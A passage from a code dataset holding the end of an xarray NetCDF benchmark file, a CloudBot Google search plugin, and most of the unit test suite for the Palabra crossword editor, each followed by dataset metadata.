frac_nan=0.2).astype(np.float32),
coords={'lon': lons, 'lat': lats},
dims=('lon', 'lat'),
name='baz', encoding=None,
attrs={'units': 'baz units',
'description': 'a description'})
ds.attrs = {'history': 'created for xarray benchmarking'}
self.ds_list.append(ds)
self.filenames_list.append('test_netcdf_%i.nc' % i)
class IOWriteMultipleNetCDF3(IOMultipleNetCDF):
def setup(self):
self.make_ds()
self.format = 'NETCDF3_64BIT'
def time_write_dataset_netcdf4(self):
xr.save_mfdataset(self.ds_list, self.filenames_list,
engine='netcdf4',
format=self.format)
def time_write_dataset_scipy(self):
xr.save_mfdataset(self.ds_list, self.filenames_list,
engine='scipy',
format=self.format)
class IOReadMultipleNetCDF4(IOMultipleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF4'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_netcdf4(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4').load()
def time_open_dataset_netcdf4(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4')
class IOReadMultipleNetCDF3(IOReadMultipleNetCDF4):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF3_64BIT'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_scipy(self):
xr.open_mfdataset(self.filenames_list, engine='scipy').load()
def time_open_dataset_scipy(self):
xr.open_mfdataset(self.filenames_list, engine='scipy')
class IOReadMultipleNetCDF4Dask(IOMultipleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF4'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_netcdf4_with_block_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks).load()
def time_open_dataset_netcdf4_with_block_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks)
def time_open_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks)
def time_open_dataset_netcdf4_with_time_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks)
def time_open_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks)
class IOReadMultipleNetCDF3Dask(IOReadMultipleNetCDF4Dask):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF3_64BIT'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_scipy_with_block_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.block_chunks).load()
def time_load_dataset_scipy_with_time_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.time_chunks).load()
def time_open_dataset_scipy_with_block_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.block_chunks)
def time_open_dataset_scipy_with_time_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.time_chunks)
| apache-2.0 | 338,617,318,366,091,800 | 37.358722 | 78 | 0.522483 | false |
weylin/CloudBot | plugins/google.py | 3 | 1653 | import random
from cloudbot.util import http, formatting
def api_get(kind, query):
"""Use the RESTful Google Search API"""
url = 'http://ajax.googleapis.com/ajax/services/search/%s?' \
'v=1.0&safe=moderate'
return http.get_json(url % kind, q=query)
# @hook.command("googleimage", "gis", "image")
def googleimage(text):
"""<query> - returns the first google image result for <query>"""
parsed = api_get('images', text)
if not 200 <= parsed['responseStatus'] < 300:
        raise IOError('error searching for images: {}'.format(parsed['responseStatus']))
if not parsed['responseData']['results']:
return 'no images found'
return random.choice(parsed['responseData']['results'][:10])['unescapedUrl']
# @hook.command("google", "g", "search")
def google(text):
"""<query> - returns the first google search result for <query>"""
parsed = api_get('web', text)
if not 200 <= parsed['responseStatus'] < 300:
        raise IOError('error searching for pages: {}'.format(parsed['responseStatus']))
if not parsed['responseData']['results']:
return 'No results found.'
result = parsed['responseData']['results'][0]
title = http.unescape(result['titleNoFormatting'])
title = formatting.truncate_str(title, 60)
content = http.unescape(result['content'])
if not content:
content = "No description available."
else:
content = http.html.fromstring(content).text_content()
content = formatting.truncate_str(content, 150).replace('\n', '')
return '{} -- \x02{}\x02: "{}"'.format(result['unescapedUrl'], title, content)
| gpl-3.0 | -9,151,805,508,851,293,000 | 34.934783 | 96 | 0.639443 | false |
svisser/palabra | tests/test_editor.py | 1 | 38885 | # This file is part of Palabra
#
# Copyright (C) 2009 - 2011 Simeon Visser
#
# Palabra is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import unittest
import palabralib.cPalabra as cPalabra
from palabralib.grid import Grid
from palabralib.puzzle import Puzzle
import palabralib.constants as constants
import palabralib.editor as editor
import palabralib.word as word
class EditorMockWindow:
def __init__(self):
self.called = 0
def transform_grid(self, transform, **args):
self.called += 1
class EditorTestCase(unittest.TestCase):
def setUp(self):
self.grid = Grid(15, 15)
self.puzzle = Puzzle(self.grid)
self.e_settings = editor.EditorSettings()
self.e_settings.selection = editor.Selection(0, 0, "across")
self.warnings = {}
for w in constants.WARNINGS:
self.warnings[w] = False
cPalabra.preprocess_all()
def testCharSlots(self):
slots = editor.get_char_slots(self.grid, 'K')
self.assertEqual(slots, [])
cells = [(i, i) for i in xrange(5)]
for i, j in cells:
self.grid.set_char(i, j, 'K')
slots = editor.get_char_slots(self.grid, 'K')
self.assertEqual(len(slots), 5)
lengths = [l for x, y, d, l in slots]
self.assertEqual(lengths.count(1), 5)
self.assertEqual([(x, y) for x, y, d, l in slots], cells)
def testLengthSlots(self):
for l in [-1, 0, 14]:
slots = editor.get_length_slots(self.grid, l)
self.assertEqual(slots, [])
slots = editor.get_length_slots(self.grid, 15)
self.assertEqual(len(slots), 30)
for x, y, d, l in slots:
self.assertEqual(l, 15)
self.assertEqual(len([1 for x, y, d, l in slots if d == "across"]), 15)
self.assertEqual(len([1 for x, y, d, l in slots if d == "down"]), 15)
def testOpenSlots(self):
slots = editor.get_open_slots(self.grid)
self.assertEqual(len(slots), len(self.grid.compute_open_squares()))
for x, y, d, l in slots:
self.assertEqual(l, 1)
def testExpandSlots(self):
slots_a = [(0, 0, "across", 5)]
slots_d = [(3, 4, "down", 6)]
exp_a = [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0)]
exp_d = [(3, 4), (3, 5), (3, 6), (3, 7), (3, 8), (3, 9)]
result_a = editor.expand_slots(slots_a)
result_d = editor.expand_slots(slots_d)
self.assertEqual(result_a, exp_a)
self.assertEqual(result_d, exp_d)
self.assertEqual(editor.expand_slots(slots_a + slots_d), exp_a + exp_d)
def testHighlights(self):
"""Clearing the highlights means no cells are highlighted."""
cells = editor.compute_highlights(self.grid, clear=True)
self.assertEqual(cells, [])
def testHighlightsLength(self):
"""Slots can be highlighted by length."""
slots = editor.compute_highlights(self.grid, "length", 15)
self.assertEqual(len(slots), self.grid.count_words())
for s in slots:
self.assertTrue(s[3], 15)
def testHighlightsChar(self):
"""Highlighting a character results in that many slots to highlight."""
for i in xrange(5):
self.grid.set_char(i, i, 'A')
cells = editor.compute_highlights(self.grid, "char", 'A')
self.assertEqual(len(cells), 5)
def testHighlightsOpen(self):
"""All open cells can be highlighted."""
cells = editor.compute_highlights(self.grid, "open")
self.assertEqual(len(cells), len(list(self.grid.cells())))
def testHighlightsTwo(self):
"""Highlighting individual cells results in slots of length 1."""
arg = [(1, 1), (5, 5), (3, 4), (4, 3)]
cells = editor.compute_highlights(self.grid, "cells", arg)
self.assertEqual(len(arg), len(cells))
for x, y in arg:
self.assertTrue((x, y, "across", 1) in cells)
def testHighlightsSlots(self):
result = editor.compute_highlights(self.grid, "slot", (0, 0, "down"))
self.assertTrue((0, 0, "down", 15) in result)
self.grid.set_block(5, 0, True)
result = editor.compute_highlights(self.grid, "slot", (0, 0, "across"))
self.assertTrue((0, 0, "across", 5) in result)
slots = [(0, 0, "across"), (0, 0, "down")]
result = editor.compute_highlights(self.grid, "slots", slots)
self.assertTrue((0, 0, "across", 5) in result)
self.assertTrue((0, 0, "down", 15) in result)
def testSymmetryInvalid(self):
self.assertEqual(editor.apply_symmetry(self.grid, [], -1, -1), [])
def testSymmetryHorizontal(self):
symms = [constants.SYM_HORIZONTAL]
for x in xrange(5):
result = editor.apply_symmetry(self.grid, symms, x, x)
self.assertEqual(result, [(x, self.grid.height - 1 - x)])
self.assertEqual(editor.apply_symmetry(self.grid, symms, 7, 7), [(7, 7)])
def testSymmetryVertical(self):
symms = [constants.SYM_VERTICAL]
for x in xrange(5):
result = editor.apply_symmetry(self.grid, symms, x, x)
self.assertEqual(result, [(self.grid.width - 1 - x, x)])
self.assertEqual(editor.apply_symmetry(self.grid, symms, 7, 7), [(7, 7)])
def _checkSymms(self, result, expect):
for c in expect:
self.assertTrue(c in result)
self.assertEqual(len(result), len(expect))
def testSymmetryTwo(self):
expect = [(0, self.grid.height - 1)
, (self.grid.width - 1, 0)
, (self.grid.width - 1, self.grid.height - 1)]
symms_1 = [constants.SYM_HORIZONTAL, constants.SYM_VERTICAL]
symms_2 = [constants.SYM_90]
self._checkSymms(editor.apply_symmetry(self.grid, symms_1, 0, 0), expect)
self._checkSymms(editor.apply_symmetry(self.grid, symms_2, 0, 0), expect)
def testSymmetryThree(self):
symms = [constants.SYM_90]
for g in [self.grid, Grid(12, 14)]:
result = editor.apply_symmetry(g, symms, 1, 0)
expect = [(g.width - 1, 1)
, (g.width - 2, g.height - 1)
, (0, g.height - 2)]
self._checkSymms(result, expect)
def testSymmetryFour(self):
symms = [constants.SYM_180]
cells = [(0, 0, [(14, 14)]), (5, 5, [(9, 9)])]
for x, y, expect in cells:
self._checkSymms(editor.apply_symmetry(self.grid, symms, x, y), expect)
def testSymmetryFive(self):
symms = [constants.SYM_DIAGONALS]
result = editor.apply_symmetry(self.grid, symms, 1, 0)
self._checkSymms(result, [(0, 1), (14, 13), (13, 14)])
def testTransformBlocks(self):
self.assertEqual(editor.transform_blocks(self.grid, [], -1, -1, True), [])
result = editor.transform_blocks(self.grid, [], 0, 0, True)
self.assertEqual(result, [(0, 0, True)])
result = editor.transform_blocks(self.grid, [constants.SYM_180], 0, 0, True)
self.assertEqual(result, [(0, 0, True), (14, 14, True)])
def testTransformBlocksTwo(self):
self.grid.set_block(0, 0, True)
result = editor.transform_blocks(self.grid, [], 0, 0, True)
self.assertEqual(result, [])
result = editor.transform_blocks(self.grid, [constants.SYM_180], 14, 14, True)
self.assertEqual(result, [(14, 14, True)])
result = editor.transform_blocks(self.grid, [], 0, 0, False)
self.assertEqual(result, [(0, 0, False)])
result = editor.transform_blocks(self.grid, [constants.SYM_180], 14, 14, False)
self.assertEqual(result, [(0, 0, False)])
def testComputeWordCellsNone(self):
o = editor.compute_word_cells(self.grid, None, 0, 0, "across")
self.assertEqual(o, [])
def testComputeWordCellsOne(self):
o = editor.compute_word_cells(self.grid, "palabra", 0, 0, "across")
expect = [(0, 0, 'P'), (1, 0, 'A'), (2, 0, 'L'), (3, 0, 'A'), (4, 0, 'B'), (5, 0, 'R'), (6, 0, 'A')]
self.assertEqual(o, expect)
def testComputeWordCellsTwo(self):
self.grid.set_char(0, 0, 'P')
self.grid.set_char(3, 0, 'A')
o = editor.compute_word_cells(self.grid, "palabra", 0, 0, "across")
expect = [(1, 0, 'A'), (2, 0, 'L'), (4, 0, 'B'), (5, 0, 'R'), (6, 0, 'A')]
self.assertEqual(o, expect)
o = editor.compute_word_cells(self.grid, "PALABRA", 0, 0, "across")
expect = [(1, 0, 'A'), (2, 0, 'L'), (4, 0, 'B'), (5, 0, 'R'), (6, 0, 'A')]
self.assertEqual(o, expect)
def testSelection(self):
for i in xrange(self.grid.width):
result = editor.compute_editor_of_cell([(i, 0)], self.puzzle, self.e_settings)
self.assertTrue((i, 0, constants.COLOR_CURRENT_WORD) in result)
if i == 0:
self.assertTrue((i, 0, constants.COLOR_PRIMARY_SELECTION) in result)
def testSelectionTwo(self):
"""Cells behind a block are not part of the selection."""
self.grid.set_block(5, 0, True)
result = editor.compute_editor_of_cell([(6, 0)], self.puzzle, self.e_settings)
self.assertEqual(result, [])
def testSelectionThree(self):
"""Cells behind a void are not part of the selection."""
self.grid.set_void(5, 0, True)
result = editor.compute_editor_of_cell([(6, 0)], self.puzzle, self.e_settings)
self.assertEqual(result, [])
def testCurrentOne(self):
self.e_settings.current = (1, 0)
self.e_settings.settings["symmetries"] = [constants.SYM_180]
result = editor.compute_editor_of_cell([(1, 0)], self.puzzle, self.e_settings)
self.assertTrue((1, 0, constants.COLOR_PRIMARY_ACTIVE) in result)
def testCurrentTwo(self):
self.e_settings.current = (3, 0)
self.e_settings.settings["symmetries"] = [constants.SYM_180]
cells = [(3, 0), (self.grid.width - 4, self.grid.height - 1)]
result = editor.compute_editor_of_cell(cells, self.puzzle, self.e_settings)
self.assertTrue((3, 0, constants.COLOR_PRIMARY_ACTIVE) in result)
cell = (self.grid.width - 4, self.grid.height - 1, constants.COLOR_SECONDARY_ACTIVE)
self.assertTrue(cell in result)
def testWarningsTwoLetterAcross(self):
g = self.grid
g.set_block(2, 0, True)
self.warnings[constants.WARN_TWO_LETTER] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue((1, 0) in result)
self.assertTrue(len(result) == 2)
def testWarningsTwoLetterDown(self):
g = self.grid
g.set_block(0, 2, True)
self.warnings[constants.WARN_TWO_LETTER] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue((0, 1) in result)
self.assertTrue(len(result) == 2)
def testWarningsUnchecked(self):
g = self.grid
g.set_block(1, 0, True)
self.warnings[constants.WARN_UNCHECKED] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue(len(result) == 1)
def testWarningsIsolation(self):
g = self.grid
g.set_block(1, 0, True)
g.set_block(0, 1, True)
self.warnings[constants.WARN_UNCHECKED] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue(len(result) == 1)
def testWarningsConsecutive(self):
g = self.grid
g.set_block(1, 0, True)
self.warnings[constants.WARN_CONSECUTIVE] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertEqual(result, [])
g.set_block(1, 1, True)
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue((0, 1) in result)
self.assertTrue(len(result) == 2)
def testWarningsMultiple(self):
g = self.grid
g.set_block(4, 0, True)
g.set_block(4, 1, True)
g.set_block(3, 2, True)
self.warnings[constants.WARN_UNCHECKED] = True
self.warnings[constants.WARN_CONSECUTIVE] = True
self.warnings[constants.WARN_TWO_LETTER] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((3, 0) in result)
self.assertTrue((3, 1) in result)
self.assertTrue(len(result) == 2)
def testEditorWarnings(self):
self.grid.set_block(2, 0, True)
self.grid.set_block(self.grid.width - 2, 0, True)
self.e_settings.warnings[constants.WARN_UNCHECKED] = True
self.e_settings.warnings[constants.WARN_TWO_LETTER] = True
result = editor.compute_editor_of_cell(list(self.grid.cells()), self.puzzle, self.e_settings)
self.assertTrue((0, 0, constants.COLOR_WARNING) in result)
self.assertTrue((self.grid.width - 1, 0, constants.COLOR_WARNING) in result)
def testComputeSelectionOtherDir(self):
s = self.e_settings.selection
next = editor.compute_selection(s, other_dir=True)
self.assertEqual(next[0], s.x)
self.assertEqual(next[1], s.y)
self.assertEqual(next[2], "down")
def testComputeSelectionPos(self):
s = self.e_settings.selection
next = editor.compute_selection(s, x=5, y=3)
self.assertEqual(next[0], 5)
self.assertEqual(next[1], 3)
self.assertEqual(next[2], "across")
def testComputeSelectionDir(self):
s = self.e_settings.selection
next = editor.compute_selection(s, direction="down")
self.assertEqual(next[0], s.x)
self.assertEqual(next[1], s.y)
self.assertEqual(next[2], "down")
def testComputeSelectionPosDir(self):
s = self.e_settings.selection
next = editor.compute_selection(s, x=2, y=7, direction="down")
self.assertEqual(next[0], 2)
self.assertEqual(next[1], 7)
self.assertEqual(next[2], "down")
def testComputeSelectionAlone(self):
s = self.e_settings.selection
next = editor.compute_selection(s, x=2)
self.assertEqual(next[0], 2)
self.assertEqual(next[1], 0)
self.assertEqual(next[2], "across")
next = editor.compute_selection(s, y=2)
self.assertEqual(next[0], 0)
self.assertEqual(next[1], 2)
self.assertEqual(next[2], "across")
def testSearchArgsOne(self):
g = Grid(5, 5)
l, cs, more = editor.compute_search_args(g, (0, 0, "across"))
self.assertEqual(l, 5)
self.assertEqual(cs, [])
self.assertEqual(len(more), 5)
for i in xrange(5):
self.assertEqual(more[i], (0, 5, []))
def testSearchArgsInvalid(self):
"""No search arguments are computed for an invalid cell."""
result = editor.compute_search_args(Grid(5, 5), (-1, -1, "across"), True)
self.assertEqual(result, None)
def testSearchArgsLengthOne(self):
"""No search arguments are computed for a slot of length 1."""
g = Grid(5, 5)
g.set_block(1, 0, True)
result = editor.compute_search_args(g, (0, 0, "across"), True)
self.assertEqual(result, None)
def testSearchArgsFullyFilledIn(self):
"""When a slot is fully filled in, no search arguments are returned."""
g = Grid(5, 5)
g.set_char(0, 0, 'A')
g.set_char(1, 0, 'A')
g.set_char(2, 0, 'A')
g.set_char(3, 0, 'A')
g.set_char(4, 0, 'A')
result = editor.compute_search_args(g, (0, 0, "across"), False)
self.assertEqual(result, None)
l, cs, more = editor.compute_search_args(g, (0, 0, "across"), True)
self.assertEqual(l, 5)
self.assertEqual(len(cs), 5)
self.assertEqual(len(more), 5)
def testAttemptFill(self):
g = Grid(5, 5)
g2 = editor.attempt_fill(g, ["koala"])
self.assertEqual(g2.count_chars(include_blanks=False), 5)
g = Grid(5, 5)
g2 = editor.attempt_fill(g, ["koala", "steam"])
self.assertEqual(g2.count_chars(include_blanks=False), 10)
cPalabra.postprocess()
def testAttemptFillDoesNotFit(self):
g = Grid(5, 5)
g2 = editor.attempt_fill(g, ["doesnotfit"])
self.assertEqual(g, g2)
cPalabra.postprocess()
def testAttemptFillIntersect(self):
g = Grid(3, 3)
g.set_block(1, 1, True)
g.set_block(2, 2, True)
g2 = editor.attempt_fill(g, ["foo", "fix"])
self.assertEqual(g2.count_chars(include_blanks=False), 5)
cPalabra.postprocess()
def testAttemptFillIntersectTwo(self):
# A B C
        # D . F
# E H G
words = ["abc", "ade", "cfg", "ehg"]
g = Grid(3, 3)
g.set_block(1, 1, True)
g2 = editor.attempt_fill(g, words)
self.assertEqual(g2.count_chars(include_blanks=False), 8)
counts = dict([(g2.data[y][x]["char"], 1) for x, y in g2.cells() if not g2.data[y][x]["block"]])
self.assertEqual(len(counts), 8)
words.reverse()
g3 = editor.attempt_fill(g, words)
        self.assertEqual(g3.count_chars(include_blanks=False), 8)
        counts = dict([(g3.data[y][x]["char"], 1) for x, y in g3.cells() if not g3.data[y][x]["block"]])
self.assertEqual(len(counts), 8)
cPalabra.postprocess()
def testAttemptFillNoIntersectingAcross(self):
g = Grid(3, 1)
g2 = editor.attempt_fill(g, ["abc"])
self.assertEqual(g2.count_chars(include_blanks=False), 3)
def testAttemptFillNoIntersectingDown(self):
g = Grid(1, 3)
g2 = editor.attempt_fill(g, ["def"])
self.assertEqual(g2.count_chars(include_blanks=False), 3)
def testAttemptFillVoids(self):
g = Grid(3, 3)
g.set_void(0, 0, True)
g.set_void(2, 2, True)
g2 = editor.attempt_fill(g, ["axa", "bxb"])
self.assertEqual(g2.count_chars(include_blanks=False), 5)
def testAttemptFillAlreadyFilledIn(self):
g = Grid(3, 3)
g.set_block(1, 1, True)
g.set_block(2, 2, True)
g.set_char(0, 0, 'A')
g2 = editor.attempt_fill(g, ["aaa"])
self.assertEqual(g2.count_chars(include_blanks=False), 3)
def testAttemptFillVarLengths(self):
g = Grid(5, 5)
for y in xrange(5):
for x in xrange(y, 5):
g.set_block(x, y, True)
g2 = editor.attempt_fill(g, ["aaaa", "bbb", "cc"])
self.assertEqual(g2.count_chars(include_blanks=False), 9)
def testAttemptFillTwo(self):
# A B
# D C
g = Grid(2, 2)
g2 = editor.attempt_fill(g, ["ab", "bc", "dc", "ad"])
self.assertEqual(g2.count_chars(include_blanks=False), 4)
def testAttemptFillNine(self):
# K L M
# N O P
# Q R S
g = Grid(3, 3)
g2 = editor.attempt_fill(g, ["klm", "nop", "qrs", "knq", "lor", "mps"])
self.assertEqual(g2.count_chars(include_blanks=False), 9)
def testOnTypingPeriod(self):
"""If the user types a period then a block is placed and selection is moved."""
actions = editor.on_typing(self.grid, gtk.keysyms.period, (0, 0, "across"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "blocks")
self.assertEqual(actions[0].args, {'x': 0, 'y': 0, 'status': True})
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 1, 'y': 0})
def testOnTypingPeriodTwo(self):
"""If the current direction is down then the selected cell moves down."""
actions = editor.on_typing(self.grid, gtk.keysyms.period, (0, 0, "down"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 0, 'y': 1})
def testOnTypingPeriodThree(self):
"""If the user types next to a block, the selection is not moved."""
self.grid.set_block(1, 0, True)
actions = editor.on_typing(self.grid, gtk.keysyms.period, (0, 0, "across"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "blocks")
self.assertEqual(actions[0].args, {'x': 0, 'y': 0, 'status': True})
def testOnTypingChar(self):
"""If the user types a valid character then it is placed and selection is moved."""
actions = editor.on_typing(self.grid, gtk.keysyms.k, (1, 1, "across"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(1, 1, 'K')]})
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 2, 'y': 1})
def testOnTypingInvalidChar(self):
"""If the user types an invalid character then nothing happens."""
actions = editor.on_typing(self.grid, gtk.keysyms.slash, (5, 5, "down"))
self.assertEqual(actions, [])
def testOnTypingInvalidCell(self):
"""If the user types when no valid cell is selected then nothing happens."""
actions = editor.on_typing(self.grid, gtk.keysyms.a, (-1, -1, "across"))
self.assertEqual(actions, [])
def testOnTypingNotAvailableCell(self):
"""If the user types while an unavailable cell is selected then nothing happens."""
self.grid.set_block(3, 3, True)
actions = editor.on_typing(self.grid, gtk.keysyms.a, (3, 3, "across"))
self.assertEqual(actions, [])
def testOnTypingCharAlreadyThere(self):
"""If the user types a character that is already there then only selection moves."""
self.grid.set_char(5, 5, 'A')
actions = editor.on_typing(self.grid, gtk.keysyms.a, (5, 5, "down"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 5, 'y': 6})
def testOnDeleteNothingThere(self):
"""If the user deletes an empty cell then nothing happens."""
actions = editor.on_delete(self.grid, (0, 0, "across"))
self.assertEqual(actions, [])
def testOnDeleteChar(self):
"""If the user deletes a character then it is removed."""
self.grid.set_char(4, 4, 'P')
actions = editor.on_delete(self.grid, (4, 4, "across"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(4, 4, '')]})
def testSelectionDeltaUpRight(self):
"""Applying a selection delta is possible when cell is available."""
actions = editor.apply_selection_delta(self.grid, (3, 3, "across"), 0, -1)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 3, 'y': 2})
actions = editor.apply_selection_delta(self.grid, (4, 4, "across"), 1, 0)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 5, 'y': 4})
def testSelectionDeltaUpFail(self):
"""Applying a selection delta fails when no cell is available."""
actions = editor.apply_selection_delta(self.grid, (5, 0, "across"), 0, -1)
self.assertEqual(actions, [])
self.grid.set_block(3, 3, True)
actions = editor.apply_selection_delta(self.grid, (3, 4, "across"), 0, -1)
self.assertEqual(actions, [])
def testBackspaceCurrentCell(self):
"""Character is removed from cell when user presses backspace."""
self.grid.set_char(3, 3, 'A')
actions = editor.on_backspace(self.grid, (3, 3, "across"))
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(3, 3, '')]})
def testBackspacePreviousCell(self):
"""Move selection to previous cell on backspace and remove char there."""
self.grid.set_char(3, 3, 'A')
actions = editor.on_backspace(self.grid, (4, 3, "across"))
self.assertEqual(len(actions), 2)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(3, 3, '')]})
self.assertEqual(actions[1].type, "selection")
self.assertEqual(actions[1].args, {'x': 3, 'y': 3})
def testInsertWordInvalid(self):
"""A word cannot be inserted when the selected slot is invalid."""
actions = editor.insert(self.grid, (-1, -1, "across"), "australia")
self.assertEqual(actions, [])
def testInsertWordCells(self):
"""A word cannot be inserted when there are no empty cells."""
self.grid.set_block(3, 0, True)
self.grid.set_char(0, 0, 'S')
self.grid.set_char(1, 0, 'P')
self.grid.set_char(2, 0, 'Y')
actions = editor.insert(self.grid, (0, 0, "across"), "spy")
self.assertEqual(actions, [])
def testInsertWordCellsAvailable(self):
"""A word can be inserted when there are empty cells."""
self.grid.set_block(3, 0, True)
self.grid.set_char(0, 0, 'A')
self.grid.set_char(1, 0, 'B')
actions = editor.insert(self.grid, (0, 0, "across"), "abc")
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(2, 0, 'C')]})
def testInsertWordCellsMatch(self):
"""Existing characters don't have to match the inserted word."""
self.grid.set_block(3, 0, True)
self.grid.set_char(0, 0, 'D')
self.grid.set_char(1, 0, 'E')
actions = editor.insert(self.grid, (0, 0, "across"), "abc")
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "chars")
self.assertEqual(actions[0].args, {'cells': [(2, 0, 'C')]})
def testKeyBackspace(self):
"""Pressing backspace in the editor results at least one action."""
args = self.grid, (5, 5, "across"), gtk.keysyms.BackSpace
actions = editor.determine_editor_actions(*args)
self.assertTrue(actions != [])
def testKeyTab(self):
"""Pressing tab in the editor results in an action when selection is available."""
args = self.grid, (5, 5, "across"), gtk.keysyms.Tab
actions = editor.determine_editor_actions(*args)
        self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "swapdir")
args = self.grid, (-1, -1, "across"), gtk.keysyms.Tab
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
self.grid.set_block(5, 5, True)
args = self.grid, (5, 5, "across"), gtk.keysyms.Tab
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyHome(self):
"""Pressing the Home key has no effect when nothing is selected."""
args = self.grid, (-1, -1, "across"), gtk.keysyms.Home
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyHomeNotAvailable(self):
"""Pressing the Home key has no effect when cell is not available."""
self.grid.set_void(5, 5, True)
args = self.grid, (5, 5, "across"), gtk.keysyms.Home
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyEnd(self):
"""Pressing the End key has no effect when nothing is selected."""
args = self.grid, (-1, -1, "across"), gtk.keysyms.End
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyEndNotAvailable(self):
"""Pressing the End key has no effect when cell is not available."""
self.grid.set_void(5, 5, True)
args = self.grid, (5, 5, "across"), gtk.keysyms.End
actions = editor.determine_editor_actions(*args)
self.assertEqual(actions, [])
def testKeyHomeWorks(self):
"""Pressing the Home key results in a selection action."""
args = self.grid, (5, 5, "across"), gtk.keysyms.Home
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': 0, 'y': 5})
def testKeyEndWorks(self):
"""Pressing the End key results in a selection action."""
args = self.grid, (5, 5, "across"), gtk.keysyms.End
actions = editor.determine_editor_actions(*args)
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].type, "selection")
self.assertEqual(actions[0].args, {'x': self.grid.width - 1, 'y': 5})
def testKeyArrow(self):
"""Pressing an arrow key results in a selection action."""
KEYS = [gtk.keysyms.Left, gtk.keysyms.Right, gtk.keysyms.Up, gtk.keysyms.Down]
